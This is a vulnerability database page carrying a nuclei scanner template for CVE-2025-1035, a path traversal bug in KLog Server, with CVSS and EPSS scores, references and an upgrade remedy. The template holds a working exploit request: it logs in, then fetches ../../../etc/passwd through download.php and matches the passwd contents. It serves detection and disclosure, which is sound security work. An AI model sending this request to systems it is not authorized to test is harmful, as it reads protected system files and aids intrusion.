Lucene search
K

KLog Server - Path Traversal

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

KLog Server vulnerability allows path traversal affecting versions before 3.1.1, potential data exposure.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-1035
18 Feb 202512:15
attackerkb
Circl
CVE-2025-1035
18 Feb 202512:15
circl
CNNVD
Komtera KLog Server 路径遍历漏洞
18 Feb 202500:00
cnnvd
CVE
CVE-2025-1035
18 Feb 202511:30
cve
Cvelist
CVE-2025-1035 Path Traversal in Komtera Technolgies' KLog Server
18 Feb 202511:30
cvelist
NVD
CVE-2025-1035
18 Feb 202512:15
nvd
Positive Technologies
PT-2025-6822
18 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2025-1035
7 Jan 202609:17
redhatcve
Vulnrichment
CVE-2025-1035 Path Traversal in Komtera Technolgies' KLog Server
18 Feb 202511:30
vulnrichment
id: CVE-2025-1035

info:
  name: KLog Server - Path Traversal
  author: s4e-io
  severity: medium
  description: |
    Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.
  impact: |
    Authenticated attackers can exploit path traversal vulnerabilities to read arbitrary files from the KLog Server, potentially exposing sensitive system files, configuration data, and stored logs.
  remediation: |
    Upgrade to KLog Server version 3.1.1 or later that addresses the path traversal vulnerability.
  reference:
    - https://www.byresearchers.net/2025/02/cve-2025-1035-klog-server-31.html
    - https://www.usom.gov.tr/bildirim/tr-25-0037
    - https://www.cve.org/CVERecord?id=CVE-2025-1035
  classification:
    epss-score: 0.09755
    epss-percentile: 0.94948
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.7
    cve-id: CVE-2025-1035
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    vendor: klogserver
    product: klog_server
  tags: cve,cve2025,klog-server,lfi,vuln

variables:
  filename: "{{to_lower(rand_text_alpha(6))}}"

http:
  - raw:
      - |
        POST /actions/entree.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pswd={{password}}&action=login

      - |
        GET /actions/download.php?action=web&file=../../../etc/passwd&name={{filename}}.zip HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body_2)"
          - 'contains_all(header_2, "application/octet-stream", "filename=")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a00483046022100cc96952d7a5495455ad7581768b2c28c71b8be70de0649eb700ca483f854f1b6022100c1ef7b4a5d83550f24c32083cb6c6a92416720f13a95d7aa2b949f175b587215:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.15.7
EPSS0.09676
SSVC
22